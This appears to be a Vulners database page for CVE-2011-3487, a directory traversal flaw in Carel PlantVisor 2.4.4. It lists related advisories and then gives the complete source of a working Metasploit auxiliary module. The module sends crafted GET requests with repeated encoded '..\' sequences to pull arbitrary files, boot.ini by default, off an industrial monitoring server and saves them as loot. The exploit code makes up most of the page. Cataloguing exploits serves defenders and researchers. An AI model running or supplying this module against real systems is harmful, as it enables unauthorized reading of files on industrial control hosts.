| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Carel PlantVisor 2.4.4 - Directory Traversal Vulnerability | 13 Sep 201700:00 | – | zdt | |
| Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure Exploit | 13 Sep 201700:00 | – | zdt | |
| CVE-2011-3487 | 16 Sep 201114:00 | – | cve | |
| CVE-2011-3487 | 16 Sep 201114:00 | – | cvelist | |
| EUVD-2011-3450 | 7 Oct 202500:30 | – | euvd | |
| Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit) | 13 Sep 201700:00 | – | exploitpack | |
| CVE-2011-3487 | 16 Sep 201114:28 | – | nvd | |
| PlantVisor Enhanced <= 2.4.4 Directory Traversal Vulnerability - Active Check | 14 Sep 201100:00 | – | openvas | |
| Carel PlantVisor 2.4.4 Directory Traversal | 15 Sep 201700:00 | – | packetstorm | |
| Directory traversal | 16 Sep 201114:28 | – | prion |
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carel Pl@ntVisor Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
triggered by sending a specially crafted GET request to the
victim server.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3487' ],
[ 'BID', '49601' ],
],
'DisclosureDate' => 'Jun 29 2012'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("..%5c" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}",
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation